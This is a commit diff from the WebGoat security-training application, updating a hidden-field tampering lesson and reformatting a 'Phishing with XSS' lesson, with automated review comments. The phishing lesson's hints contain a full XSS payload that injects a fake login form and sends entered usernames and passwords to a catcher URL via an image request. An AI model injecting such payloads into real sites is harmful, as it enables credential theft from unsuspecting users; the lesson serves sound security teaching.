Added client-side validation to HiddenFieldTampering.java, added a new ECS makeButton with an OnClick function, corrected authorship in several files

git-svn-id: http://webgoat.googlecode.com/svn/trunk@220 4033779f-a91e-0410-96ef-6bf7bf53c507
mayhew64 2008-01-09 13:28:07 +00:00
parent 3645564018
commit 84ca966ce5
9 changed files with 1354 additions and 1336 deletions


@ -46,7 +46,7 @@ import org.owasp.webgoat.session.WebSession;
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
* site</a> (this lesson is heavily based on Jeff Williams' SQL * site</a> (this lesson is heavily based on Bruce Mayhews' SQL
* Injection lesson * Injection lesson
* @created January 14, 2005 * @created January 14, 2005
*/ */


@ -53,8 +53,8 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class DOS_Login extends LessonAdapter public class DOS_Login extends LessonAdapter
{ {


@ -2,9 +2,11 @@ package org.owasp.webgoat.lessons;
import java.util.ArrayList; import java.util.ArrayList;
import java.util.List; import java.util.List;
import java.util.regex.Pattern;
import org.apache.ecs.Element; import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer; import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.A; import org.apache.ecs.html.A;
import org.apache.ecs.html.B; import org.apache.ecs.html.B;
import org.apache.ecs.html.BR; import org.apache.ecs.html.BR;
@ -48,191 +50,193 @@ import org.owasp.webgoat.session.WebSession;
* for free software projects. * for free software projects.
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
* @created October 28, 2003 * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
*/ * @created October 28, 2003
*/
public class HiddenFieldTampering extends LessonAdapter public class HiddenFieldTampering extends LessonAdapter
{ {
public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); public final static A ASPECT_LOGO =
new A().setHref("http://www.aspectsecurity.com").addElement(
private final static String PRICE = "Price"; new IMG("images/logos/aspect.jpg")
.setAlt("Aspect Security").setBorder(0)
.setHspace(0).setVspace(0));
private final static String PRICE_TV = "2999.99"; private final static String PRICE = "Price";
private final static String PRICE_TV_HACKED = "9.99"; private final static String PRICE_TV = "2999.99";
private final static String PRICE_TV_HACKED = "9.99";
/** String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any interesting exploit!
* Constructor for the HiddenFieldScreen object Pattern pattern1 = Pattern.compile(regex);
*/ String lineSep = System.getProperty("line.separator");
public HiddenFieldTampering() String script =
{} "<SCRIPT>" + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
+ "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
+" document.form." + PRICE + ".value = " + PRICE_TV + ";}"
+ lineSep + "else document.form.submit();" + lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
/**
/** * Constructor for the HiddenFieldScreen object
* Description of the Method */
* public HiddenFieldTampering()
* @param s Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{ {
String price = s.getParser().getRawParameter(PRICE, PRICE_TV);
float quantity = s.getParser().getFloatParameter("QTY", 1.0f);
float total = quantity * Float.parseFloat(price);
if (price.equals(PRICE_TV))
{
ec.addElement(new Center().addElement(new H1()
.addElement("Shopping Cart ")));
ec.addElement(new BR());
Table t = new Table().setCellSpacing(0).setCellPadding(2)
.setBorder(1).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
TR tr = new TR();
tr.addElement(new TH().addElement(
"Shopping Cart Items -- To Buy Now").setWidth("80%"));
tr.addElement(new TH().addElement("Price:").setWidth("10%"));
tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
tr.addElement(new TH().addElement("Total").setWidth("7%"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD()
.addElement("56 inch HDTV (model KTV-551)"));
tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
tr.addElement(new TD().addElement(
new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
tr.addElement(new TD().addElement("$" + total));
t.addElement(tr);
ec.addElement(t);
t = new Table().setCellSpacing(0).setCellPadding(2)
.setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
t.setBorder(1);
}
ec.addElement(new BR());
tr = new TR();
tr.addElement(new TD()
.addElement("The total charged to your credit card:"));
tr.addElement(new TD().addElement("$" + total));
tr.addElement(new TD().addElement(ECSFactory
.makeButton("Update Cart")));
tr.addElement(new TD().addElement(ECSFactory
.makeButton("Purchase")));
t.addElement(tr);
ec.addElement(t);
Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV);
ec.addElement(input);
ec.addElement(new BR());
}
else
{
if (!price.toString().equals(PRICE_TV))
{
makeSuccess(s);
}
ec.addElement(new P().addElement("Your total price is:"));
ec.addElement(new B("$" + total));
ec.addElement(new BR());
ec
.addElement(new P()
.addElement("This amount will be charged to your credit card immediately."));
}
}
catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
e.printStackTrace();
} }
return (ec); /**
} * Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
ec.addElement(new StringElement(script));
float quantity;
float total;
String price = PRICE_TV;
try
{
price = s.getParser().getRawParameter(PRICE, PRICE_TV);
quantity = s.getParser().getFloatParameter("QTY", 1.0f);
total = quantity * Float.parseFloat(price);
}
catch (Exception e)
{
s.setMessage("Invaild data " + this.getClass().getName());
price = PRICE_TV;
quantity = 1.0f;
total = quantity * Float.parseFloat(PRICE_TV);
}
/** if (price.equals(PRICE_TV))
* DOCUMENT ME! {
* ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
* @return DOCUMENT ME! ec.addElement(new BR());
*/ Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
protected Category getDefaultCategory()
{
return Category.UNVALIDATED_PARAMETERS;
}
if (s.isColor())
{
t.setBorder(1);
}
/** TR tr = new TR();
* Gets the hints attribute of the HiddenFieldScreen object tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
* tr.addElement(new TH().addElement("Price:").setWidth("10%"));
* @return The hints value tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
*/ tr.addElement(new TH().addElement("Total").setWidth("7%"));
protected List<String> getHints(WebSession s) t.addElement(tr);
{
List<String> hints = new ArrayList<String>();
hints
.add("This application is using hidden fields to transmit price information to the server.");
hints
.add("Use a program to intercept and change the value in the hidden field.");
hints
.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
+ PRICE_TV + " to " + PRICE_TV_HACKED + ".");
return hints; tr = new TR();
} tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)"));
tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
tr.addElement(new TD().addElement("$" + total));
t.addElement(tr);
ec.addElement(t);
/** t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
* Gets the instructions attribute of the HiddenFieldTampering object
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions = "Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
return (instructions); if (s.isColor())
} {
t.setBorder(1);
}
private final static Integer DEFAULT_RANKING = new Integer(50); ec.addElement(new BR());
tr = new TR();
tr.addElement(new TD().addElement("The total charged to your credit card:"));
tr.addElement(new TD().addElement("$" + total));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart")));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Purchase", "validate()")));
t.addElement(tr);
ec.addElement(t);
protected Integer getDefaultRanking() Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV);
{ ec.addElement(input);
return DEFAULT_RANKING; ec.addElement(new BR());
}
} else
{
if (!price.toString().equals(PRICE_TV))
{
makeSuccess(s);
}
/** ec.addElement(new P().addElement("Your total price is:"));
* Gets the title attribute of the HiddenFieldScreen object ec.addElement(new B("$" + total));
* ec.addElement(new BR());
* @return The title value ec.addElement(new P().addElement("This amount will be charged to your credit card immediately."));
*/ }
public String getTitle()
{ return (ec);
return ("Exploit Hidden Fields"); }
}
/**
public Element getCredits() * DOCUMENT ME!
{ *
return super.getCustomCredits("", ASPECT_LOGO); * @return DOCUMENT ME!
} */
protected Category getDefaultCategory()
{
return Category.UNVALIDATED_PARAMETERS;
}
/**
* Gets the hints attribute of the HiddenFieldScreen object
*
* @return The hints value
*/
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("This application is using hidden fields to transmit price information to the server.");
hints.add("Use a program to intercept and change the value in the hidden field.");
hints
.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
+ PRICE_TV + " to " + PRICE_TV_HACKED + ".");
return hints;
}
/**
* Gets the instructions attribute of the HiddenFieldTampering object
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions =
"Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
return (instructions);
}
private final static Integer DEFAULT_RANKING = new Integer(50);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the title attribute of the HiddenFieldScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Exploit Hidden Fields");
}
public Element getCredits()
{
return super.getCustomCredits("", ASPECT_LOGO);
}
} }
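Review bot: `Pattern pattern1 = Pattern.compile(regex);` is never referenced anywhere in the new HiddenFieldTampering body, so the field and the `java.util.regex.Pattern` import the first hunk adds for it are dead code; the only validation actually performed is the JavaScript copy of `regex` emitted in `script`, which is wired solely to the Purchase button via `ECSFactory.makeButton("Purchase", "validate()")` while the server-side `price.equals(PRICE_TV)` comparison stays the authoritative check. The unescaped `.` in `"^" + PRICE_TV + "$"` is acknowledged by the inline comment; if it is not meant as part of the lesson, `Pattern.quote(PRICE_TV)` on the Java side and `2999\\.99` in the emitted script would make the match literal. The user-visible message in the catch block has a typo: `s.setMessage("Invaild data " + this.getClass().getName());` should read `"Invalid data "`. `validate()` also assumes the enclosing form is reachable as `document.form`, which cannot be confirmed from this file.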


@ -39,8 +39,8 @@ import org.owasp.webgoat.session.WebSession;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class HttpBasics extends LessonAdapter public class HttpBasics extends LessonAdapter
{ {


@ -48,235 +48,251 @@ import org.owasp.webgoat.session.WebSession;
* for free software projects. * for free software projects.
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created March 13, 2007 * @created March 13, 2007
*/ */
public class Phishing extends LessonAdapter public class Phishing extends LessonAdapter
{ {
/** /**
* Description of the Field * Description of the Field
*/ */
protected final static String SEARCH = "Username"; protected final static String SEARCH = "Username";
private String searchText; private String searchText;
/**
* Description of the Method
*
* @param s Description of the Parameter
* @return Description of the Return Value
*/
private boolean postedCredentials(WebSession s)
{
String postedToCookieCatcher = getLessonTracker(s).getLessonProperties()
.getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
//<START_OMIT_SOURCE>
return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
//<END_OMIT_SOURCE>
}
/**
* Description of the Method
*
* @param s Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{
searchText = s.getParser().getRawParameter(SEARCH,"");
//<START_OMIT_SOURCE>
//<END_OMIT_SOURCE>
ec.addElement(makeSearch(s));
if (postedCredentials(s))
{
makeSuccess(s);
}
}
catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
}
return (ec);
}
protected Element makeSearch(WebSession s)
{
ElementContainer ec = new ElementContainer();
ec.addElement(new H1().addElement("WebGoat Search "));
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
.setAlign("center");
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
if (s.isColor())
{
t.setBorder(1);
}
tr = new TR();
tr
.addElement(new TH()
.addElement(
"This facility will search the WebGoat source.")
.setColSpan(2).setAlign("center"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
TR row1 = new TR();
row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
Input input1 = new Input(Input.TEXT, SEARCH, searchText);
row1.addElement(new TD(input1).setAlign("left"));
t.addElement(row1);
Element b = ECSFactory.makeButton("Search");
t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
ec.addElement(t);
if (!searchText.equals(""))
{
ec.addElement(new BR());
ec.addElement(new HR());
ec.addElement(new BR());
ec.addElement(new StringElement("Results for: " + searchText));
ec.addElement(new Comment("Search results"));
ec.addElement(new BR());
ec.addElement(new BR());
ec.addElement(new B(new StringElement("No results were found.")));
ec.addElement(new Comment("End of Search results"));
}
return (ec);
}
/**
* Gets the hints attribute of the CluesScreen object
*
* @return The hints value
*/
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints
.add("Try adding HTML to the search field to create a fake authentication form.<BR>" +
"Try to make the form look official.");
hints.add("Try: <BR> " +
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("Add functionality that can post a request, a button might work<BR><BR>" +
"After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>" +
"http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints.add("Try: <BR> " +
"&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot;&gt;"+
"<BR><BR>Solution for this hint:<BR><BR>" +
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("Make the button perform an action on submit, <BR>" +
"adding an onclick=\"hack()\" might work<BR>"+
"Don't forget to add the hack() javascript function" +
"<BR><BR>Solution for this hint:<BR><BR>" +
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("You need to create the hack() function. This function will pull the credentials from the " +
"webpage and post them to the WebGoat catcher servlet. <BR>" +
"<BR> Some useful code snippets:<UL>" +
"<LI>doucument.forms[0].user.value - will access the user field" +
"<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" +
"<LI>javascript string concatentation uses a \"+\" </UL>" +
"<BR><BR>Solution for this hint():<BR><BR>" +
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." +
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " +
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" +
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" +
"&lt;/script&gt;");
hints.add("Complete solution for this lesson:<BR><BR>" +
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." +
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " +
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" +
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" +
"&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/** /**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen.\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}</script><form><br><br><HR><H3>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR> <!-- * Description of the Method
* *
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/ */
return hints; private boolean postedCredentials(WebSession s)
} {
/** String postedToCookieCatcher =
* Gets the instructions attribute of the XssSearch object getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>" +
"Below is an example of a standard search feature.<br>" +
"Using XSS and HTML insertion, your goal is to: <UL>" +
"<LI>Insert html to that requests credentials" +
"<LI>Add javascript to actually collect the credentials" +
"<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> " +
"To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions); // <START_OMIT_SOURCE>
} return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
// <END_OMIT_SOURCE>
}
private final static Integer DEFAULT_RANKING = new Integer(30); /**
* Description of the Method
*
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
try
{
searchText = s.getParser().getRawParameter(SEARCH, "");
// <START_OMIT_SOURCE>
// <END_OMIT_SOURCE>
protected Integer getDefaultRanking() ec.addElement(makeSearch(s));
{ if (postedCredentials(s))
return DEFAULT_RANKING; {
} makeSuccess(s);
}
}
catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
}
return (ec);
}
/** protected Element makeSearch(WebSession s)
* Gets the category attribute of the FailOpenAuthentication object {
* ElementContainer ec = new ElementContainer();
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.XSS;
}
ec.addElement(new H1().addElement("WebGoat Search "));
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
if (s.isColor())
{
t.setBorder(1);
}
tr = new TR();
tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
.setAlign("center"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
t.addElement(tr);
TR row1 = new TR();
row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
Input input1 = new Input(Input.TEXT, SEARCH, searchText);
row1.addElement(new TD(input1).setAlign("left"));
t.addElement(row1);
Element b = ECSFactory.makeButton("Search");
t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
ec.addElement(t);
if (!searchText.equals(""))
{
ec.addElement(new BR());
ec.addElement(new HR());
ec.addElement(new BR());
ec.addElement(new StringElement("Results for: " + searchText));
ec.addElement(new Comment("Search results"));
ec.addElement(new BR());
ec.addElement(new BR());
ec.addElement(new B(new StringElement("No results were found.")));
ec.addElement(new Comment("End of Search results"));
}
return (ec);
}
/**
* Gets the hints attribute of the CluesScreen object
*
* @return The hints value
*/
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
+ "Try to make the form look official.");
hints
.add("Try: <BR> "
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Add functionality that can post a request, a button might work<BR><BR>"
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+ "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints
.add("Try: <BR> "
+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot;&gt;"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Make the button perform an action on submit, <BR>"
+ "adding an onclick=\"hack()\" might work<BR>"
+ "Don't forget to add the hack() javascript function"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("You need to create the hack() function. This function will pull the credentials from the "
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
+ "<BR> Some useful code snippets:<UL>"
+ "<LI>doucument.forms[0].user.value - will access the user field"
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
+ "<BR><BR>Solution for this hint():<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+ "&lt;/script&gt;");
hints
.add("Complete solution for this lesson:<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+ "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/**
* password<script>function hack(){ alert("Had this been a real
* attack... Your credentials were just stolen.\nUser Name = " +
* document.forms(0).user.value + "\nPassword = " +
* document.forms(0).pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value +
* "&password=" + document.forms(0).pass.value + "";}</script><form><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2>
* <br>
* <br>
* Enter Username:<br>
* <input type="text" id="user" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
* <br>
* <HR>
* <!--
*
*/
return hints;
}
/**
* Gets the instructions attribute of the XssSearch object
*
* @return The instructions value
*/
public String getInstructions(WebSession s)
{
String instructions =
"This lesson is an example of how a website might support a phishing attack<BR><BR>"
+ "Below is an example of a standard search feature.<br>"
+ "Using XSS and HTML insertion, your goal is to: <UL>"
+ "<LI>Insert html to that requests credentials"
+ "<LI>Add javascript to actually collect the credentials"
+ "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions);
}
private final static Integer DEFAULT_RANKING = new Integer(30);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the category attribute of the FailOpenAuthentication object
*
* @return The category value
*/
protected Category getDefaultCategory()
{
return Category.XSS;
}
/**
* Gets the title attribute of the CluesScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Phishing with XSS");
}
/**
* Gets the title attribute of the CluesScreen object
*
* @return The title value
*/
public String getTitle()
{
return ("Phishing with XSS");
}
} }
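Review bot: `searchText` is kept in the instance field `private String searchText;`, assigned from the request in `createContent` and read back in `makeSearch` and in the `"Results for: " + searchText` output; if one Phishing instance serves more than one session, as the `WebSession s` parameter suggests, concurrent requests can observe each other's search text. Passing the value explicitly, e.g. `protected Element makeSearch(WebSession s, String searchText)` with the field removed, or re-reading it from `s.getParser()` inside `makeSearch`, removes the shared mutable state; `makeSearch` is `protected`, so any subclass override would need the same change. The remainder of the hunk appears to be re-indentation and comment re-wrapping.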


@ -41,8 +41,8 @@ import org.owasp.webgoat.session.WebSession;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class UserAdminScreen extends LessonAdapter public class UserAdminScreen extends LessonAdapter
{ {


@ -419,8 +419,8 @@ public class Course
} }
if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName)) if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
{ {
